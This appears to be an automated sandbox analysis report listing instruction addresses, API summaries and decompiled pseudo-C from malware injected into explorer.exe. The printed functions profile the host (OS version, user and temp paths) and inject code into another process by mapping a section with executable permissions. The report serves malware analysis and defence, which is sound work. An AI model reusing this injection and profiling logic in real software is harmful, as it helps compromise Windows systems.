                                                                                                                                                                                              0x02f8edde
                                                                                                                                                                                              0x02f8edde
                                                                                                                                                                                              0x02f8ede1
                                                                                                                                                                                              0x02f8ede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ec0f
                                                                                                                                                                                              0x02f8ec17
                                                                                                                                                                                              0x02f8ec1e
                                                                                                                                                                                              0x02f8ec24
                                                                                                                                                                                              0x02f8ec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ec2f
                                                                                                                                                                                              0x02f8ec44
                                                                                                                                                                                              0x02f8ec4a
                                                                                                                                                                                              0x02f8ec53
                                                                                                                                                                                              0x02f8ec56
                                                                                                                                                                                              0x02f8ec59
                                                                                                                                                                                              0x02f8ec5b
                                                                                                                                                                                              0x02f8edd1
                                                                                                                                                                                              0x02f8edd4
                                                                                                                                                                                              0x02f8eddd
                                                                                                                                                                                              0x02f8eddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eddd
                                                                                                                                                                                              0x02f8ec6b
                                                                                                                                                                                              0x02f8ec6e
                                                                                                                                                                                              0x02f8ec75
                                                                                                                                                                                              0x02f8ec7b
                                                                                                                                                                                              0x02f8ec7e
                                                                                                                                                                                              0x02f8ec81
                                                                                                                                                                                              0x02f8ec84
                                                                                                                                                                                              0x02f8ec87
                                                                                                                                                                                              0x02f8ecc3
                                                                                                                                                                                              0x02f8ecc3
                                                                                                                                                                                              0x02f8ecc6
                                                                                                                                                                                              0x02f8ed72
                                                                                                                                                                                              0x02f8ed86
                                                                                                                                                                                              0x02f8ed96
                                                                                                                                                                                              0x02f8ed9a
                                                                                                                                                                                              0x02f8ed9c
                                                                                                                                                                                              0x02f8edb3
                                                                                                                                                                                              0x02f8edb7
                                                                                                                                                                                              0x02f8edc0
                                                                                                                                                                                              0x02f8edcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8edcb
                                                                                                                                                                                              0x02f8eda2
                                                                                                                                                                                              0x02f8eda3
                                                                                                                                                                                              0x02f8eda8
                                                                                                                                                                                              0x02f8eda8
                                                                                                                                                                                              0x02f8edaa
                                                                                                                                                                                              0x02f8edab
                                                                                                                                                                                              0x02f8edb0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8edb0
                                                                                                                                                                                              0x02f8eccc
                                                                                                                                                                                              0x02f8eccc
                                                                                                                                                                                              0x02f8eccf
                                                                                                                                                                                              0x02f8ed3a
                                                                                                                                                                                              0x02f8ed4e
                                                                                                                                                                                              0x02f8ed5e
                                                                                                                                                                                              0x02f8ed62
                                                                                                                                                                                              0x02f8ed64
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ed6a
                                                                                                                                                                                              0x02f8ed6b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ed6b
                                                                                                                                                                                              0x02f8ecd1
                                                                                                                                                                                              0x02f8ecd1
                                                                                                                                                                                              0x02f8ecd4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecd6
                                                                                                                                                                                              0x02f8ecd9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecdb
                                                                                                                                                                                              0x02f8ecdb
                                                                                                                                                                                              0x02f8ece1
                                                                                                                                                                                              0x02f8ecfd
                                                                                                                                                                                              0x02f8ed0c
                                                                                                                                                                                              0x02f8ed15
                                                                                                                                                                                              0x02f8ed1a
                                                                                                                                                                                              0x02f8ed1d
                                                                                                                                                                                              0x02f8ed23
                                                                                                                                                                                              0x02f8ed23
                                                                                                                                                                                              0x02f8ed28
                                                                                                                                                                                              0x02f8ed34
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ed34
                                                                                                                                                                                              0x02f8ece6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ece6
                                                                                                                                                                                              0x02f8ec89
                                                                                                                                                                                              0x02f8ecb0
                                                                                                                                                                                              0x02f8ecb5
                                                                                                                                                                                              0x02f8ecba
                                                                                                                                                                                              0x02f8ecbc
                                                                                                                                                                                              0x02f8ecbc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecba
                                                                                                                                                                                              0x02f8ec8b
                                                                                                                                                                                              0x02f8ec8b
                                                                                                                                                                                              0x02f8ec8e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ec94
                                                                                                                                                                                              0x02f8ec94
                                                                                                                                                                                              0x02f8ec97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ec9d
                                                                                                                                                                                              0x02f8ec9d
                                                                                                                                                                                              0x02f8eca0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eca6
                                                                                                                                                                                              0x02f8eca9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ecab
                                                                                                                                                                                              0x02f8eded
                                                                                                                                                                                              0x02f8edf3
                                                                                                                                                                                              0x02f8edf9
                                                                                                                                                                                              0x02f8edfc
                                                                                                                                                                                              0x02f8edff
                                                                                                                                                                                              0x02f8edff
                                                                                                                                                                                              0x02f8ee02
                                                                                                                                                                                              0x02f8ee03
                                                                                                                                                                                              0x02f8ee06
                                                                                                                                                                                              0x02f8ee08
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee58
                                                                                                                                                                                              0x02f8ee58
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee58
                                                                                                                                                                                              0x02f8eb8f
                                                                                                                                                                                              0x02f8eb95
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eb95
                                                                                                                                                                                              0x02f8ee55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ead8
                                                                                                                                                                                              0x02f8eadd
                                                                                                                                                                                              0x02f8eae2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eae6

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E413
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E424
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoCreateInstance.OLE32(02F9C868,00000000,00000001,02F9C878,?,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E43B
                                                                                                                                                                                                • Part of subcall function 02F8E400: SysAllocString.OLEAUT32(00000000), ref: 02F8E446
                                                                                                                                                                                                • Part of subcall function 02F8E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E471
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8EAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8EB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8EE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8EE99
                                                                                                                                                                                                • Part of subcall function 02F88BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: 5c73c0cdd4d9e9b6bfaec70fde637b4c483f2ffc3db0d450fd3de34118d7f30e
                                                                                                                                                                                              • Instruction ID: 7cf5e28562f0d64c3d19d3c2860de64dbd4a2231fbb496fa3b47757690bfdda6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c73c0cdd4d9e9b6bfaec70fde637b4c483f2ffc3db0d450fd3de34118d7f30e
                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E13F72E00219AFDB14EFA4CC94EAEFBB9FF48780F144459E616A7250DB71A905CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8DF3D Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E02F8DF3D(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x2f9f830; // 0x2f80000
				_t68 = E02F88BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x2f9f818; // 0x508f6c8
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E02F93548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x2f9f818; // 0x508f6c8
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E02F895F3(_t194, _t207);
					}
					_t75 =  *0x2f9f818; // 0x508f6c8
					_t77 = E02F8C879( *((intOrPtr*)(_t75 + 0x12c))());
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E02F8C9F4( *_t77) == 0) {
						_t79 = E02F8C8C9(_t159, _t194);
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220
					 *((intOrPtr*)(_t192 + 0x218)) = E02F8F3A3(_t14);
					 *((intOrPtr*)(_t192 + 0x21c)) = E02F8F368(_t14);
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x2f9f820; // 0x508f8b8
					_push(0);
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t89 =  *0x2f9f828; // 0x508f838
					_t90 =  *((intOrPtr*)(_t89 + 0x3c))(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E02F8DF36(_t149);
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E02F895F3(_t149, _t211);
					}
					_t92 = E02F8C6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E02F8C4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E02F899DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E02F8960D(_t149, _t36);
					_t97 = E02F8E2C5(_t196, E02F8A43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E02F8C6E4(_t97, _t37, _t216);
					_t99 =  *0x2f9f818; // 0x508f6c8
					 *((intOrPtr*)(_t192 + 0x101c)) = E02F8CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195));
					E02F88D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E02F8DD39(_t100);
					_t106 = E02F8DD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E02F89DF2(_t105, 0x9cf);
					_t177 =  *0x2f9f818; // 0x508f6c8
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x2f9f818; // 0x508f6c8
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E02F88BAF( &_v8);
					_t113 =  *0x2f9f818; // 0x508f6c8
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E02F89E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x2f9f818; // 0x508f6c8
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x2f9f818; // 0x508f6c8
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x2f9f818; // 0x508f6c8
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x2f9f818; // 0x508f6c8
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x2f9f818; // 0x508f6c8
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x2f9f818; // 0x508f6c8
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E02F93548(E02F8E2C5(_t62, E02F8A43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E02F9351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E02F896DA(_t66, _t191);
					 *((intOrPtr*)(_t192 + 0x1898)) = E02F8DAE3(_t191);
					return _t192;
				}
				return _t68;
			}




















































                                                                                                                                                                                              0x02f8df3d
                                                                                                                                                                                              0x02f8df47
                                                                                                                                                                                              0x02f8df53
                                                                                                                                                                                              0x02f8df58
                                                                                                                                                                                              0x02f8df5d
                                                                                                                                                                                              0x02f8df6a
                                                                                                                                                                                              0x02f8df70
                                                                                                                                                                                              0x02f8df75
                                                                                                                                                                                              0x02f8df7b
                                                                                                                                                                                              0x02f8df8b
                                                                                                                                                                                              0x02f8df90
                                                                                                                                                                                              0x02f8df95
                                                                                                                                                                                              0x02f8df95
                                                                                                                                                                                              0x02f8dfa5
                                                                                                                                                                                              0x02f8dfab
                                                                                                                                                                                              0x02f8dfad
                                                                                                                                                                                              0x02f8dfb6
                                                                                                                                                                                              0x02f8dfb6
                                                                                                                                                                                              0x02f8dfbc
                                                                                                                                                                                              0x02f8dfc9
                                                                                                                                                                                              0x02f8dfce
                                                                                                                                                                                              0x02f8dfd4
                                                                                                                                                                                              0x02f8dfdd
                                                                                                                                                                                              0x02f8dfeb
                                                                                                                                                                                              0x02f8dff2
                                                                                                                                                                                              0x02f8dff7
                                                                                                                                                                                              0x02f8dff7
                                                                                                                                                                                              0x02f8dff8
                                                                                                                                                                                              0x02f8dfdf
                                                                                                                                                                                              0x02f8dfdf
                                                                                                                                                                                              0x02f8dfdf
                                                                                                                                                                                              0x02f8dffe
                                                                                                                                                                                              0x02f8e009
                                                                                                                                                                                              0x02f8e014
                                                                                                                                                                                              0x02f8e01a
                                                                                                                                                                                              0x02f8e01a
                                                                                                                                                                                              0x02f8e023
                                                                                                                                                                                              0x02f8e029
                                                                                                                                                                                              0x02f8e02d
                                                                                                                                                                                              0x02f8e034
                                                                                                                                                                                              0x02f8e03b
                                                                                                                                                                                              0x02f8e042
                                                                                                                                                                                              0x02f8e046
                                                                                                                                                                                              0x02f8e04d
                                                                                                                                                                                              0x02f8e04e
                                                                                                                                                                                              0x02f8e050
                                                                                                                                                                                              0x02f8e055
                                                                                                                                                                                              0x02f8e05c
                                                                                                                                                                                              0x02f8e05e
                                                                                                                                                                                              0x02f8e05e
                                                                                                                                                                                              0x02f8e064
                                                                                                                                                                                              0x02f8e06e
                                                                                                                                                                                              0x02f8e073
                                                                                                                                                                                              0x02f8e073
                                                                                                                                                                                              0x02f8e080
                                                                                                                                                                                              0x02f8e086
                                                                                                                                                                                              0x02f8e08b
                                                                                                                                                                                              0x02f8e08d
                                                                                                                                                                                              0x02f8e096
                                                                                                                                                                                              0x02f8e096
                                                                                                                                                                                              0x02f8e09e
                                                                                                                                                                                              0x02f8e0a3
                                                                                                                                                                                              0x02f8e0a3
                                                                                                                                                                                              0x02f8e0a9
                                                                                                                                                                                              0x02f8e0b4
                                                                                                                                                                                              0x02f8e0b9
                                                                                                                                                                                              0x02f8e0c1
                                                                                                                                                                                              0x02f8e0c7
                                                                                                                                                                                              0x02f8e0cf
                                                                                                                                                                                              0x02f8e0e1
                                                                                                                                                                                              0x02f8e0e7
                                                                                                                                                                                              0x02f8e0ef
                                                                                                                                                                                              0x02f8e0f4
                                                                                                                                                                                              0x02f8e112
                                                                                                                                                                                              0x02f8e118
                                                                                                                                                                                              0x02f8e11d
                                                                                                                                                                                              0x02f8e120
                                                                                                                                                                                              0x02f8e123
                                                                                                                                                                                              0x02f8e130
                                                                                                                                                                                              0x02f8e136
                                                                                                                                                                                              0x02f8e140
                                                                                                                                                                                              0x02f8e140
                                                                                                                                                                                              0x02f8e146
                                                                                                                                                                                              0x02f8e14e
                                                                                                                                                                                              0x02f8e159
                                                                                                                                                                                              0x02f8e15e
                                                                                                                                                                                              0x02f8e164
                                                                                                                                                                                              0x02f8e166
                                                                                                                                                                                              0x02f8e173
                                                                                                                                                                                              0x02f8e174
                                                                                                                                                                                              0x02f8e175
                                                                                                                                                                                              0x02f8e180
                                                                                                                                                                                              0x02f8e182
                                                                                                                                                                                              0x02f8e189
                                                                                                                                                                                              0x02f8e189
                                                                                                                                                                                              0x02f8e193
                                                                                                                                                                                              0x02f8e198
                                                                                                                                                                                              0x02f8e19d
                                                                                                                                                                                              0x02f8e19d
                                                                                                                                                                                              0x02f8e1a3
                                                                                                                                                                                              0x02f8e1aa
                                                                                                                                                                                              0x02f8e1ab
                                                                                                                                                                                              0x02f8e1b8
                                                                                                                                                                                              0x02f8e1cb
                                                                                                                                                                                              0x02f8e1d0
                                                                                                                                                                                              0x02f8e1d5
                                                                                                                                                                                              0x02f8e1de
                                                                                                                                                                                              0x02f8e1de
                                                                                                                                                                                              0x02f8e1e4
                                                                                                                                                                                              0x02f8e1e9
                                                                                                                                                                                              0x02f8e1ef
                                                                                                                                                                                              0x02f8e1f5
                                                                                                                                                                                              0x02f8e1fa
                                                                                                                                                                                              0x02f8e203
                                                                                                                                                                                              0x02f8e205
                                                                                                                                                                                              0x02f8e20c
                                                                                                                                                                                              0x02f8e20c
                                                                                                                                                                                              0x02f8e212
                                                                                                                                                                                              0x02f8e21a
                                                                                                                                                                                              0x02f8e21f
                                                                                                                                                                                              0x02f8e220
                                                                                                                                                                                              0x02f8e225
                                                                                                                                                                                              0x02f8e22e
                                                                                                                                                                                              0x02f8e230
                                                                                                                                                                                              0x02f8e23b
                                                                                                                                                                                              0x02f8e23b
                                                                                                                                                                                              0x02f8e244
                                                                                                                                                                                              0x02f8e24c
                                                                                                                                                                                              0x02f8e253
                                                                                                                                                                                              0x02f8e258
                                                                                                                                                                                              0x02f8e267
                                                                                                                                                                                              0x02f8e27f
                                                                                                                                                                                              0x02f8e286
                                                                                                                                                                                              0x02f8e294
                                                                                                                                                                                              0x02f8e29f
                                                                                                                                                                                              0x02f8e2a0
                                                                                                                                                                                              0x02f8e2a4
                                                                                                                                                                                              0x02f8e2aa
                                                                                                                                                                                              0x02f8e2ab
                                                                                                                                                                                              0x02f8e2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8e2c0
                                                                                                                                                                                              0x02f8e2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02F8DF64
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02F8E05E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 02F8E123
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 02F8E14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateCurrentDirectoryErrorHeapLastProcessVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 3743117707-2706916422
                                                                                                                                                                                              • Opcode ID: 60c5019018b0c890a8df25c289da1bfa876fe33f40d1f5b69566e74654fa1972
                                                                                                                                                                                              • Instruction ID: 817733fc2249971b847bc3966817e30574a608e69239be67f75fd4aca931ddde
                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c5019018b0c890a8df25c289da1bfa876fe33f40d1f5b69566e74654fa1972
                                                                                                                                                                                              • Instruction Fuzzy Hash: 11917F71B40605ABE704FB74DC49FEAF7E9BF08780F00466AE61AD7240DB70A9558FA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8D447 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 223registrystringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E02F8D447(intOrPtr __ecx, intOrPtr __edx) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				struct HINSTANCE__* _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				struct HINSTANCE__* _v48;
				char _v52;
				struct HINSTANCE__* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t90;
				intOrPtr _t95;
				char _t97;
				short _t98;
				intOrPtr _t105;
				void* _t107;
				intOrPtr _t110;
				intOrPtr _t113;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				struct HINSTANCE__* _t138;
				intOrPtr _t145;
				void* _t147;
				char _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t160;
				intOrPtr _t162;
				char _t163;
				void* _t165;

				_t81 =  *0x2f9f81c; // 0x2fb0000
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E02F8F0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x2f9f918; // 0x0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x2f9f818; // 0x508f6c8
						_t160 =  *0x2f9f918; // 0x0
						 *((intOrPtr*)(_t160 + 0x10))( *((intOrPtr*)(_t87 + 0x12c))(_v16));
					}
					if(_v20 != 0) {
						_t85 =  *0x2f9f918; // 0x0
						 *((intOrPtr*)(_t85 + 0x20))(_v20);
					}
					return _v8;
				}
				_push(_t138);
				_push(0x8000000);
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				_push(0x40);
				_push( &_v52);
				_push(_t138);
				_push(0xe);
				_push( &_v20);
				_t95 =  *0x2f9f918; // 0x0
				if( *((intOrPtr*)(_t95 + 0xc))() < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x2f9ce44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t162 =  *0x2f9f918; // 0x0
				_t105 =  *0x2f9f818; // 0x508f6c8
				_t107 =  *((intOrPtr*)(_t162 + 0x14))(_v20,  *((intOrPtr*)(_t105 + 0x12c))( &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40));
				_t158 = _v12;
				if(_t107 < 0) {
					goto L15;
				} else {
					_push(0x40);
					_push(_t138);
					_push(2);
					_push( &_v24);
					_push(_t138);
					_push(_t138);
					_push(_t138);
					_push( &_v8);
					_t110 =  *0x2f9f918; // 0x0
					_push(_t158);
					_push(_v20);
					if( *((intOrPtr*)(_t110 + 0x14))() < 0) {
						goto L15;
					}
					_t154 = E02F88C43( *0x2f9f81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t113 =  *0x2f9f818; // 0x508f6c8
					_t163 =  *((intOrPtr*)(_t113 + 0x54))(_t158, _t138, 0x1ac4, 0x1000, 4);
					_t145 =  *0x2f9f818; // 0x508f6c8
					 *((intOrPtr*)(_t145 + 0x20))(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E02F88BF4( &_v36, 0x1ac4);
					_t119 =  *0x2f9f81c; // 0x2fb0000
					_t155 =  *0x2f9f830; // 0x2f80000
					_v36 = _t119;
					 *0x2f9f830 = _v8;
					 *0x2f9f81c = _t163;
					E02F88CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E02F8D3C6(_v16, _v8, _v44);
					_t124 = E02F8A43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 =  &(_t138->i);
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x2f9f830 = _t155;
						 *0x2f9f81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}













































                                                                                                                                                                                              0x02f8d44d
                                                                                                                                                                                              0x02f8d453
                                                                                                                                                                                              0x02f8d455
                                                                                                                                                                                              0x02f8d459
